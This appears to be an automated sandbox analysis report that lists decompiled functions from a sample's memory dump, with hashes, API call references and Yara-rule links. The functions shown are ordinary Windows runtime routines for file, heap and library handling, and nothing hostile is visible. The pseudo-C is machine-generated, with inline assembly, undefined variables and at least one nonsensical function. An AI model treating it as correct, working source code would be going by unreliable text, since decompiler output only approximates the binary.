Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 32db9f1868ca9647e44b2a3589ef3e5bb283fd5690bf933bf844c6cfef2ce88e
Instruction ID: 57b4a4ce7598fc92eacd6536836d6f47d01ddb9b4ae861da001c410306a7bf50
Opcode Fuzzy Hash: 32db9f1868ca9647e44b2a3589ef3e5bb283fd5690bf933bf844c6cfef2ce88e
Instruction Fuzzy Hash: 8021F631148346ABC715DEA4C851AABBBE8AF55708F08482DB4D087541D339DA5CCB51

Uniqueness

Uniqueness Score: -1.00%

Function 0018A458, Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0018A458(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x1c1630 + _a4 * 4;
				_t27 =  *0x19e668; // 0xd6971696
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x19e668; // 0xd6971696
							goto L13;
						}
						 *_t20 = E0017E531(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E0018A4F4( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x19e668; // 0xd6971696
						goto L7;
					}
					_t27 =  *0x19e668; // 0xd6971696
					goto L8;
				}
				L2:
				return _t33;
			}

0x0018a463
0x0018a46c
0x0018a472
0x0018a47c
0x0018a47e
0x0018a482
0x0018a4ed
0x00000000
0x0018a4ed
0x0018a486
0x0018a48c
0x0018a492
0x0018a4ae
0x0018a4ae
0x0018a4b0
0x0018a4b2
0x0018a4dd
0x0018a4df
0x0018a4e7
0x0018a4eb
0x00000000
0x0018a4eb
0x0018a4be
0x0018a4c2
0x0018a4d7
0x00000000
0x0018a4d7
0x0018a4cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0018a494
0x0018a494
0x0018a496
0x0018a49e
0x00000000
0x00000000
0x0018a4a0
0x0018a4a6
0x00000000
0x00000000
0x0018a4a8
0x00000000
0x0018a4a8
0x0018a4cf
0x00000000
0x0018a4cf
0x0018a488
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,00193958), ref: 0018A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0018A4C5

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: d23c401ba758192e1c9c4d000170434634c35ffdc6d5438f9ec4dec1c63afa83
Instruction ID: 61eb1410a860f3ef41cd31cbeb8d1f3d317ddefb465d5ebb6f0ba39134f87a63
Opcode Fuzzy Hash: d23c401ba758192e1c9c4d000170434634c35ffdc6d5438f9ec4dec1c63afa83
Instruction Fuzzy Hash: 36110A336111205BBF25EE28EC4485A73D59F8472475E4122FD15AB654EB70DD41CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00169B59, Relevance: 3.1, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00169B59(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E001698E5(_t28);
						} else {
							 *0x193260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x00169b59
0x00169b5b
0x00169b61
0x00169bdb
0x00000000
0x00169bdb
0x00169b64
0x00169b69
0x00169b6d
0x00169b6f
0x00169ba9
0x00169b77
0x00169b77
0x00169b7d
0x00169b82
0x00169b9c
0x00169b84
0x00169b8d
0x00169b95
0x00169b97
0x00169ba1
0x00169ba3
0x00169ba5
0x00169ba5
0x00169b7d
0x00169baf
0x00169bc0
0x00169bcb
0x00000000
0x00169bd7
0x00000000
0x00169bd7

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00169B35,?,?,00000000,?,?,00168D9C,?), ref: 00169BC0
GetLastError.KERNEL32 ref: 00169BCD

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a30b630c5d6eb8e0c8f31d11fc23355ce8eaa2b9b91693a1025b7af8e48ddce3
Instruction ID: e5ad4701ce0815cc1aa679b75fba9850e6aac9a52f736d48298661ce666279e4
Opcode Fuzzy Hash: a30b630c5d6eb8e0c8f31d11fc23355ce8eaa2b9b91693a1025b7af8e48ddce3
Instruction Fuzzy Hash: AA01C4323042159B8B08CF65BC94D7EB39DEFC5722B14452EFD2687290CB35D8199B21

Uniqueness

Uniqueness Score: -1.00%

Function 00169E40, Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00169E40() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x1a)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00166FA5(0x1a0f50, 0x1a0f50, _t34 + 0x24);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x1a)) == 0) {
					return _t22;
				}
				E00166FA5(0x1a0f50, 0x1a0f50, _t34 + 0x24);
				goto L3;
			}

0x00169e44
0x00169e46
0x00169e51
0x00169e64
0x00169e64
0x00169e76
0x00169e7c
0x00169e80
0x00169e9d
0x00169ea3
0x00169ea8
0x00169eaa
0x00000000
0x00169e8c
0x00169e90
0x00169eb9
0x00169ead
0x00000000
0x00169ead
0x00169e98
0x00000000
0x00169e98
0x00169e80
0x00169e57
0x00000000
0x00169eb5
0x00169e5f
0x00000000

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00169E76
GetLastError.KERNEL32 ref: 00169E82

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 85addef4211c7115cde7d83a721f6b9c54fc74319c0e1f526c4dd3355a8b3d55
Instruction ID: c59c0acb7a02ed271958b0760486df0d00ae658a1e4bc3526dffbe8920818592
Opcode Fuzzy Hash: 85addef4211c7115cde7d83a721f6b9c54fc74319c0e1f526c4dd3355a8b3d55
Instruction Fuzzy Hash: 8101BC753042006FEB34DE29DC88B6BB7DD9B88324F14493EB556C3680DB36EC988610

Uniqueness

Uniqueness Score: -1.00%

Function 00188606, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00188606(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0x1c16ec, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00188394();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E001871AD(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E0018895A())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E001884DE(_t14);
					goto L6;
				}
				_t9 = E00188518(__ecx, _a8); // executed
				return _t9;
			}

0x00188606
0x00188606
0x0018860c
0x00188611
0x0018861f
0x00188622
0x00188624
0x0018862f
0x00188632
0x00188659
0x00188663
0x00188669
0x0018866b
0x00000000
0x00000000
0x0018864a
0x0018864c
0x00000000
0x00000000
0x0018864f
0x00188654
0x00188655
0x00188657
0x00000000
0x00000000
0x00188657
0x00188641
0x00000000
0x00188641
0x00188634
0x00188639
0x0018863f
0x0018863f
0x0018863f
0x00000000
0x0018863f
0x00188627
0x00000000
0x0018862c
0x00188616
0x00000000

APIs

_free.LIBCMT ref: 00188627

Part of subcall function 00188518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018C13D,00000000,?,001867E2,?,00000008,?,001889AD,?,?,?), ref: 0018854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,001A0F50,0016CE57,?,?,?,?,?,?), ref: 00188663

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 26e4b2400bd8c475960a60844bda44b38065ff3ab82c5d6cd3506c41440a5556
Instruction ID: 83238ec8a65473c3c520f80048dba56b90cb5974fe4bef84a7c75135d7ba9d5a
Opcode Fuzzy Hash: 26e4b2400bd8c475960a60844bda44b38065ff3ab82c5d6cd3506c41440a5556
Instruction Fuzzy Hash: C2F0F032241115AACB213A25AC00F6F7B699FE2BB0FB54116F82496191FF30CF009FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00170908, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00170908(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x0017091c
0x00170924
0x00000000
0x00170926
0x0017092b
0x0017092f
0x00170932
0x00170934
0x00170936
0x00170938
0x00170938
0x00170939
0x00170939
0x00170940
0x00000000
0x00170942
0x00170947

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00170915
GetProcessAffinityMask.KERNEL32(00000000), ref: 0017091C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 5745166f40ec3a12dbac4f584ce59db87aa6599f7d98df9d72d51e607734347b
Instruction ID: 66cce668b20cffaf6b584de401ed90cce8e94a1229e5e9a4ddc212b96d4fb4f4
Opcode Fuzzy Hash: 5745166f40ec3a12dbac4f584ce59db87aa6599f7d98df9d72d51e607734347b
Instruction Fuzzy Hash: F2E09B36A10205EB6F0ACAA49C044BBB3BDDB0C218715817ABA1ED3501F770DD018660

Uniqueness

Uniqueness Score: -1.00%

Function 001879B7, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001879B7(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x001879bc

APIs

Part of subcall function 0018B610: GetEnvironmentStringsW.KERNEL32 ref: 0018B619
Part of subcall function 0018B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0018B63C
Part of subcall function 0018B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0018B662
Part of subcall function 0018B610: _free.LIBCMT ref: 0018B675
Part of subcall function 0018B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0018B684

_free.LIBCMT ref: 001879FD
_free.LIBCMT ref: 00187A04

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 49edfd04a33c32305897ed10c0715b7ff351e0c8672e4dfe0fe592b3cba9eb84
Instruction ID: d98df9f32db7c1fa7ce7ed3fe2d7d428a581303e7e973228e51b1ccb4c39e444
Opcode Fuzzy Hash: 49edfd04a33c32305897ed10c0715b7ff351e0c8672e4dfe0fe592b3cba9eb84
Instruction Fuzzy Hash: EFE0ED17A4D80212D766763A6C42B6F16098BA2334BB10B2AF424EB4C3DF50CB020B96

Uniqueness

Uniqueness Score: -1.00%

Function 0016A444, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0016A444(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0017E360();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0016B66C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x0016a44c
0x0016a451
0x0016a458
0x0016a460
0x0016a465
0x0016a491
0x0016a491
0x0016a49a

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0016A27A,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0016A27A,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A489

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0cd9c45a2d075b6d7ea5f9c0974570ddfa454c954c4bb7a7aca651f52443e98d
Instruction ID: c639a64b4691155a56e0bdf8915b3d139942213bd2da897a244a70eb4897cbcc
Opcode Fuzzy Hash: 0cd9c45a2d075b6d7ea5f9c0974570ddfa454c954c4bb7a7aca651f52443e98d
Instruction Fuzzy Hash: E9F0A03124020D7BDF015F60DC45FD937ACBF04385F488051BC9896161DB728EE8AE50

Uniqueness

Uniqueness Score: -1.00%

Function 0017D573, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0017D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0017D5B8

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 843c5518f9e8b51b2eb6a80b9512c927849696881fdeae6726eaac733c83d322
Instruction ID: 969e4cb046de8001413aad4c75cf7593112c3ab902efd8ab3fdc5f9fcd7ad3e8
Opcode Fuzzy Hash: 843c5518f9e8b51b2eb6a80b9512c927849696881fdeae6726eaac733c83d322
Instruction Fuzzy Hash: 91F0EC7294034C7BDB11ABB09C07F9D3B7CAB19745F044595B604574A1DB716E608761

Uniqueness

Uniqueness Score: -1.00%

Function 0016A12D, Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0016A12D(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0017E360();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0016B66C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x0016a135
0x0016a13a
0x0016a13e
0x0016a146
0x0016a14b
0x0016a174
0x0016a174
0x0016a17d

APIs

DeleteFileW.KERNELBASE(?,?,?,0016984C,?,?,00169688,?,?,?,?,00191FA1,000000FF), ref: 0016A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0016984C,?,?,00169688,?,?,?,?,00191FA1,000000FF), ref: 0016A16C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2acb0617949d6a432d2841e58f929c7bea2f137067a8ee1fd8eba310b27041cc
Instruction ID: 1abbf9875efd142561734135f56c3d853f51c37121b852bceea085aac75d883b
Opcode Fuzzy Hash: 2acb0617949d6a432d2841e58f929c7bea2f137067a8ee1fd8eba310b27041cc
Instruction Fuzzy Hash: 45E092356402186BDB119F60DC42FE977ACFF09381F884066B888D7060DB61DDE4AE91

Uniqueness

Uniqueness Score: -1.00%

Function 0017A39D, Relevance: 3.0, APIs: 2, Instructions: 27
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0017A39D(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0x1a8430; // 0x73e7c100
				 *0x193260(_t5, _t13, _t16,  *[fs:0x0], E00191FA1, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L0017E244(); // executed
				_t8 =  *0x1c2170( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x0017a3ae
0x0017a3b5
0x0017a3c6
0x0017a3cc
0x0017a3d1
0x0017a3d6
0x0017a3e0
0x0017a3eb

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00191FA1,000000FF), ref: 0017A3D1
OleUninitialize.OLE32(?,?,?,?,00191FA1,000000FF), ref: 0017A3D6

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 334d06059097f13e763d852f9cef4fd40c40dabc023055a363f9589d64c882f0
Instruction ID: 9fb5aae8447f84a69b0e9f5a201b1cfc85c26bbcc645ac23f3b9d2b7090a6a3c
Opcode Fuzzy Hash: 334d06059097f13e763d852f9cef4fd40c40dabc023055a363f9589d64c882f0
Instruction Fuzzy Hash: 21F03932A18655EFC7109B4CDC05B19FBA8FB89B20F04436AF41983B60CB746840CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0016A194, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0016A194(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0017E360();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0016B66C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x0016a19c
0x0016a1a5
0x0016a1ab
0x0016a1b0
0x0016a1d1
0x0016a1d7
0x0016a1d7
0x0016a1df

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0016A189,?,001676B2,?,?,?,?), ref: 0016A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0016A189,?,001676B2,?,?,?,?), ref: 0016A1D1

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7c892e5159418376f9199d89a038fc82c866024d25eeec5792328297d92b5a48
Instruction ID: 05ddc4d35143a7fdbbca1f78f17d2e6965f8104ed09f8e4a58884d240e3f3e6a
Opcode Fuzzy Hash: 7c892e5159418376f9199d89a038fc82c866024d25eeec5792328297d92b5a48
Instruction Fuzzy Hash: 85E092365001285BCB20BB68DC05BD9B7ACAB193E1F0442A2FD59E3690D7709D949EE1

Uniqueness

Uniqueness Score: -1.00%

Function 00170085, Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00170085(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0017E360();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0016B965( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x0017008d
0x001700a0
0x001700a8
0x001700b6
0x001700c2
0x001700c2
0x001700cc

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001700A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0016EB86,Crypt32.dll,00000000,0016EC0A,?,?,0016EBEC,?,?,?), ref: 001700C2

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 87504198205216d55e29b7413d02eaa1a1f3e02554ac37305b1b837ceb65b386
Instruction ID: 3f1335c4a0b8b2d97e6d03bbc50dff096227df656252f122d9c05e070be6d013
Opcode Fuzzy Hash: 87504198205216d55e29b7413d02eaa1a1f3e02554ac37305b1b837ceb65b386
Instruction Fuzzy Hash: 94E0127690122C6ADB219AA49C09FD777ACFF1D392F0440A6BA48D3104DB749A94CBA0

Uniqueness

Uniqueness Score: -1.00%

